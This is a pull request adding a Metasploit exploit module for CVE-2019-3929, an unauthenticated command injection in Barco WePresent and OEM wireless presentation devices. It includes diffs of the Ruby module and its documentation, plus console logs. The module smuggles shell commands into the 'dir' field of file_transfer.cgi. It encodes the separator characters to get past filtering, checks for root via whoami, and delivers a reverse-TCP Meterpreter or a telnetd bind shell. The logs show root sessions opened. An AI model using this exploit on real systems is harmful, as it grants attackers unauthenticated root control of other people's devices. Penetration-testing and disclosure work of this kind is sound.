### PR TITLE
Exploit module for CVE-2019-3929 (Barco, Crestron, etc.)

### DIFF
--- a/documentation/modules/exploit/linux/http/wepresent_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/wepresent_cmd_injection.md
@@ -1,0 +1,109 @@
+## Vulnerable Application
+
+This module exploits [CVE-2019-3929](https://nvd.nist.gov/vuln/detail/CVE-2019-3929). The vulnerability affects [WePresent](https://www.barco.com/en/page/wepresent) devices, as well as many OEM devices (listed below). The vulnerability is an unauthenticated remote command injection via HTTP POST request to the /cgi-bin/file_transfer.cgi endpoint. 
+
+The following devices are known to be affected by this issue:
+
+* Barco wePresent WiPG-1000P <= 2.3.0.10
+* Barco wePresent WiPG-1600W <= 2.4.1.19
+* Crestron AM-100 <= 1.6.0.2
+* Crestron AM-101 <= 2.7.0.1
+* Extron ShareLink 200/250 <= 2.0.3.4
+* Teq AV IT WIPS710 <= 1.1.0.7
+* InFocus LiteShow3 <= 1.0.16
+* InFocus LiteShow4 <= 2.0.0.7
+* Optoma WPS-Pro <= 1.0.0.5
+* Blackbox HD WPS <= 1.0.0.5
+* SHARP PN-L703WA <= 1.4.2.3
+
+## Verification Steps
+
+  1. Acquire one of the vulnerable devices.
+  2. Start msfconsole
+  3. Do: `use exploit/linux/http/wepresent_cmd_injection`
+  4. Do: `set RHOSTS <device ip>`
+  5. Do: `check`
+  6. The module should indicate if the target is vulnerable or not.
+  7. Do: `set LHOST <ip>`
+  8. Do: run
+  9. A meterpreter session should be started
+
+## Options
+
+  **RPort**
+  The RPort is set to 443 by default. While these devices support HTTP over 80 and 443, the file_transfer.cgi endpoint is only available over 443.
+
+  **Target**
+
+  This module supports two targets: ARCH_CMD and ARCH_ARMLE. The default, ARM_ARMLE, will drop meterpreter on to the target. Whereas the ARCH_CMD target will start a busybox/telnetd bindshell. To switch to the ARCH_ARMLE target use the following command:
+  
+  ```
+  set target 0
+  ```
+
+## Scenarios
+
+### Tested against Crestron AM-100 1.6.0.2 
+
+#### Meterpreter
+
+```
+msf5 > use exploit/linux/http/wepresent_cmd_injection 
+msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246
+RHOSTS => 10.12.70.246
+msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238
+LHOST => 10.12.70.238
+msf5 exploit(linux/http/wepresent_cmd_injection) > check
+[+] 10.12.70.246:443 - The target is vulnerable.
+msf5 exploit(linux/http/wepresent_cmd_injection) > run
+
+[*] Started reverse TCP handler on 10.12.70.238:4444 
+[*] Command Stager progress -   9.95% done (127/1276 bytes)
+[*] Command Stager progress -  19.98% done (255/1276 bytes)
+[*] Command Stager progress -  29.94% done (382/1276 bytes)
+[*] Command Stager progress -  39.97% done (510/1276 bytes)
+[*] Command Stager progress -  50.00% done (638/1276 bytes)
+[*] Command Stager progress -  59.95% done (765/1276 bytes)
+[*] Command Stager progress -  69.75% done (890/1276 bytes)
+[*] Command Stager progress -  79.62% done (1016/1276 bytes)
+[*] Command Stager progress -  89.50% done (1142/1276 bytes)
+[*] Sending stage (904600 bytes) to 10.12.70.246
+[*] Command Stager progress - 100.08% done (1277/1276 bytes)
+[*] Command Stager progress - 101.33% done (1293/1276 bytes)
+[*] Meterpreter session 1 opened (10.12.70.238:4444 -> 10.12.70.246:40805) at 2020-01-09 05:53:34 -0500
+
+meterpreter > shell
+Process 31774 created.
+Channel 1 created.
+uname -a
+Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST 2017 armv6l GNU/Linux
+```
+
+#### Busybox/Telnetd Bind Shell
+
+```
+msf5 > use exploit/linux/http/wepresent_cmd_injection 
+msf5 exploit(linux/http/wepresent_cmd_injection) > set target 0
+target => 0
+msf5 exploit(linux/http/wepresent_cmd_injection) > set payload cmd/unix/bind_busybox_telnetd 
+payload => cmd/unix/bind_busybox_telnetd
+msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246
+RHOSTS => 10.12.70.246
+msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238
+LHOST => 10.12.70.238
+msf5 exploit(linux/http/wepresent_cmd_injection) > check
+[+] 10.12.70.246:443 - The target is vulnerable.
+msf5 exploit(linux/http/wepresent_cmd_injection) > run
+
+[*] Started bind TCP handler against 10.12.70.246:4444
+[*] Command shell session 1 opened (10.12.70.238:41457 -> 10.12.70.246:4444) at 2020-01-09 05:56:36 -0500
+
+whoami
+whoami
+root
+~/boa/cgi-bin # uname -a
+uname -a
+Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST 2017 armv6l GNU/Linux
+~/boa/cgi-bin # 
+```
+

--- a/documentation/modules/exploit/linux/http/wepresent_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/wepresent_cmd_injection.md
@@ -28,19 +28,6 @@ The following devices are known to be affected by this issue:
   8. Do: run
   9. A meterpreter session should be started
 
-## Options
-
-  **RPort**
-  The RPort is set to 443 by default. While these devices support HTTP over 80 and 443, the file_transfer.cgi endpoint is only available over 443.
-
-  **Target**
-
-  This module supports two targets: ARCH_CMD and ARCH_ARMLE. The default, ARM_ARMLE, will drop meterpreter on to the target. Whereas the ARCH_CMD target will start a busybox/telnetd bindshell. To switch to the ARCH_ARMLE target use the following command:
-  
-  ```
-  set target 0
-  ```
-
 ## Scenarios
 
 ### Tested against Crestron AM-100 1.6.0.2 

--- a/modules/exploits/linux/http/wepresent_cmd_injection.rb
+++ b/modules/exploits/linux/http/wepresent_cmd_injection.rb
@@ -83,15 +83,15 @@ class MetasploitModule < Msf::Exploit::Remote
     if check_resp.code == 200
       check_resp.body.gsub!(/[\r\n]/, "")
       if check_resp.body == "root"
-        return Exploit::CheckCode::Vulnerable
+        return CheckCode::Vulnerable
       end
     end
 
-    return Exploit::CheckCode::Safe
+    CheckCode::Safe
   end
 
   def execute_command(cmd, _opts = {})
-    send_command(";(" + cmd + ")&", nil)
+    send_command(";(#{cmd})&", nil)
   end
 
   def exploit

--- a/modules/exploits/linux/http/wepresent_cmd_injection.rb
+++ b/modules/exploits/linux/http/wepresent_cmd_injection.rb
@@ -1,0 +1,100 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "Barco WePresent file_transfer.cgi Command Injection",
+      'Description'    => %q(
+        This module exploits an unauthenticated remote command injection
+        vulnerability found in Barco WePresent and related OEM'ed products.
+        The vulnerability is triggered via an HTTP POST request to the
+        file_transfer.cgi endpoint.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         => 'Jacob Baines, @Junior_Baines',
+      'References'     =>
+        [
+          ['CVE', '2019-3929'],
+          ['EDB', '46786'],
+          ['URL', 'https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c']
+        ],
+      'DisclosureDate' => "Apr 30, 2019",
+      'Platform'       => ['unix', 'linux'],
+      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Unix In-Memory',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Type'        => :unix_memory,
+         'Payload'     => {
+           'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnetd' }
+         }],
+        ['Linux Dropper',
+         'Platform'        => 'linux',
+         'Arch'            => ARCH_ARMLE,
+         'CmdStagerFlavor' => ['printf', 'wget'],
+         'Type'            => :linux_dropper]
+      ],
+      'DefaultTarget'  => 1,
+      'DefaultOptions' => {
+        'SSL'               => true,
+        'RPORT'             => 443,
+        'CMDSTAGER::FLAVOR' => 'printf',
+        'PAYLOAD'           => 'linux/armle/meterpreter/reverse_tcp'
+      }))
+  end
+
+  def check
+    check_resp = send_request_cgi(
+      'uri'       => '/cgi-bin/file_transfer.cgi',
+      'method'    => 'POST',
+      'ssl'       => true,
+      'port'      => rport,
+      'data'      => "file_transfer=new&dir='Pa_NotewhoamiPa_Note'"
+    )
+
+    if check_resp && check_resp.code == 200
+      check_resp.body.gsub!(/[\r\n]/, "")
+      if check_resp.body == "root"
+        return Exploit::CheckCode::Vulnerable
+      end
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def filter_bad_chars(cmd)
+    cmd.gsub!(/;/, 'Pa_Note')
+    cmd.gsub!(/\+/, 'Pa_Add')
+    return cmd
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'uri'       => '/cgi-bin/file_transfer.cgi',
+      'method'    => 'POST',
+      'ssl'       => true,
+      'port'      => rport,
+      'data'      => "file_transfer=new&dir='Pa_Note(#{filter_bad_chars(cmd)})Pa_Amp'"
+    }, nil)
+  end
+
+  def exploit
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager(linemax: 128)
+    end
+  end
+end

--- a/modules/exploits/linux/http/wepresent_cmd_injection.rb
+++ b/modules/exploits/linux/http/wepresent_cmd_injection.rb
@@ -70,8 +70,6 @@ class MetasploitModule < Msf::Exploit::Remote
     resp = send_request_cgi({
       'uri'       => '/cgi-bin/file_transfer.cgi',
       'method'    => 'POST',
-      'ssl'       => ssl,
-      'port'      => rport,
       'vars_post' => vars_post
     }, timeout)
 

--- a/modules/exploits/linux/http/wepresent_cmd_injection.rb
+++ b/modules/exploits/linux/http/wepresent_cmd_injection.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
         file_transfer.cgi endpoint.
       ),
       'License'        => MSF_LICENSE,
-      'Author'         => 'Jacob Baines, @Junior_Baines',
+      'Author'         => 'Jacob Baines', # @Junior_Baines'
       'References'     =>
         [
           ['CVE', '2019-3929'],
@@ -54,21 +54,37 @@ class MetasploitModule < Msf::Exploit::Remote
       }))
   end
 
-  def check
+  def filter_bad_chars(cmd)
+    cmd.gsub!(/;/, 'Pa_Note')
+    cmd.gsub!(/\+/, 'Pa_Add')
+    cmd.gsub!(/&/, 'Pa_Amp')
+    return cmd
+  end
+
+  def send_command(cmd, timeout)
     vars_post = {
       file_transfer: 'new',
-      dir: "'Pa_NotewhoamiPa_Note'"
+      dir: "'#{filter_bad_chars(cmd)}'"
     }
 
-    check_resp = send_request_cgi(
+    resp = send_request_cgi({
       'uri'       => '/cgi-bin/file_transfer.cgi',
       'method'    => 'POST',
-      'ssl'       => true,
+      'ssl'       => ssl,
       'port'      => rport,
       'vars_post' => vars_post
-    )
+    }, timeout)
 
-    if check_resp && check_resp.code == 200
+    return resp
+  end
+
+  def check
+    check_resp = send_command(";whoami;", 5)
+    unless check_resp
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    if check_resp.code == 200
       check_resp.body.gsub!(/[\r\n]/, "")
       if check_resp.body == "root"
         return Exploit::CheckCode::Vulnerable
@@ -78,25 +94,8 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Safe
   end
 
-  def filter_bad_chars(cmd)
-    cmd.gsub!(/;/, 'Pa_Note')
-    cmd.gsub!(/\+/, 'Pa_Add')
-    return cmd
-  end
-
   def execute_command(cmd, _opts = {})
-    vars_post = {
-      file_transfer: 'new',
-      dir: "'Pa_Note(#{filter_bad_chars(cmd)})Pa_Amp'"
-    }
-
-    send_request_cgi({
-      'uri'       => '/cgi-bin/file_transfer.cgi',
-      'method'    => 'POST',
-      'ssl'       => true,
-      'port'      => rport,
-      'vars_post' => vars_post
-    }, nil)
+    send_command(";(" + cmd + ")&", nil)
   end
 
   def exploit

--- a/modules/exploits/linux/http/wepresent_cmd_injection.rb
+++ b/modules/exploits/linux/http/wepresent_cmd_injection.rb
@@ -55,12 +55,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    vars_post = {
+      file_transfer: 'new',
+      dir: "'Pa_NotewhoamiPa_Note'"
+    }
+
     check_resp = send_request_cgi(
       'uri'       => '/cgi-bin/file_transfer.cgi',
       'method'    => 'POST',
       'ssl'       => true,
       'port'      => rport,
-      'data'      => "file_transfer=new&dir='Pa_NotewhoamiPa_Note'"
+      'vars_post' => vars_post
     )
 
     if check_resp && check_resp.code == 200
@@ -80,12 +85,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
+    vars_post = {
+      file_transfer: 'new',
+      dir: "'Pa_Note(#{filter_bad_chars(cmd)})Pa_Amp'"
+    }
+
     send_request_cgi({
       'uri'       => '/cgi-bin/file_transfer.cgi',
       'method'    => 'POST',
       'ssl'       => true,
       'port'      => rport,
-      'data'      => "file_transfer=new&dir='Pa_Note(#{filter_bad_chars(cmd)})Pa_Amp'"
+      'vars_post' => vars_post
     }, nil)
   end
 

--- a/modules/exploits/linux/http/wepresent_cmd_injection.rb
+++ b/modules/exploits/linux/http/wepresent_cmd_injection.rb
@@ -67,13 +67,11 @@ class MetasploitModule < Msf::Exploit::Remote
       dir: "'#{filter_bad_chars(cmd)}'"
     }
 
-    resp = send_request_cgi({
+    send_request_cgi({
       'uri'       => '/cgi-bin/file_transfer.cgi',
       'method'    => 'POST',
       'vars_post' => vars_post
     }, timeout)
-
-    return resp
   end
 
   def check


### PR DESCRIPTION
This PR introduces an exploit module for [CVE-2019-3929](https://nvd.nist.gov/vuln/detail/CVE-2019-3929). The vulnerability is an unauthenticated remote command injection via HTTP POST request to the cgi-bin/file_transfer.cgi endpoint. This module supports both ARCH_CMD and ARCH_ARMLE (default).

Testing requires acquiring a [WePresent](https://www.barco.com/en/page/wepresent) device or one of the devices sold by various OEM. The examples in this PR are from a [Crestron AM-100](https://www.crestron.com/en-US/Products/Workspace-Solutions/Wireless-Presentation-Solutions/AirMedia-Presentation-Gateways/AM-100).

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Do: `use exploit/linux/http/wepresent_cmd_injection`
- [ ] Do: `set RHOSTS <ip>`
- [ ] Do: `check`
- [ ] Ensure the target is vulnerable
- [ ] Do: `set LHOST <ip>`
- [ ] Do: run
- [ ] A meterpreter session should be started

### Example: Meterpreter

```
msf5 > use exploit/linux/http/wepresent_cmd_injection 
msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246
RHOSTS => 10.12.70.246
msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238
LHOST => 10.12.70.238
msf5 exploit(linux/http/wepresent_cmd_injection) > check
[+] 10.12.70.246:443 - The target is vulnerable.
msf5 exploit(linux/http/wepresent_cmd_injection) > run

[*] Started reverse TCP handler on 10.12.70.238:4444 
[*] Command Stager progress -   9.95% done (127/1276 bytes)
[*] Command Stager progress -  19.98% done (255/1276 bytes)
[*] Command Stager progress -  29.94% done (382/1276 bytes)
[*] Command Stager progress -  39.97% done (510/1276 bytes)
[*] Command Stager progress -  50.00% done (638/1276 bytes)
[*] Command Stager progress -  59.95% done (765/1276 bytes)
[*] Command Stager progress -  69.75% done (890/1276 bytes)
[*] Command Stager progress -  79.62% done (1016/1276 bytes)
[*] Command Stager progress -  89.50% done (1142/1276 bytes)
[*] Sending stage (904600 bytes) to 10.12.70.246
[*] Command Stager progress - 100.08% done (1277/1276 bytes)
[*] Command Stager progress - 101.33% done (1293/1276 bytes)
[*] Meterpreter session 1 opened (10.12.70.238:4444 -> 10.12.70.246:40805) at 2020-01-09 05:53:34 -0500

meterpreter > shell
Process 31774 created.
Channel 1 created.
uname -a
Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST 2017 armv6l GNU/Linux
```

### Example: Busybox Bind Shell

```
msf5 > use exploit/linux/http/wepresent_cmd_injection 
msf5 exploit(linux/http/wepresent_cmd_injection) > set target 0
target => 0
msf5 exploit(linux/http/wepresent_cmd_injection) > set payload cmd/unix/bind_busybox_telnetd 
payload => cmd/unix/bind_busybox_telnetd
msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246
RHOSTS => 10.12.70.246
msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238
LHOST => 10.12.70.238
msf5 exploit(linux/http/wepresent_cmd_injection) > check
[+] 10.12.70.246:443 - The target is vulnerable.
msf5 exploit(linux/http/wepresent_cmd_injection) > run

[*] Started bind TCP handler against 10.12.70.246:4444
[*] Command shell session 1 opened (10.12.70.238:41457 -> 10.12.70.246:4444) at 2020-01-09 05:56:36 -0500

whoami
whoami
root
~/boa/cgi-bin # uname -a
uname -a
Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST 2017 armv6l GNU/Linux
~/boa/cgi-bin # 
```
    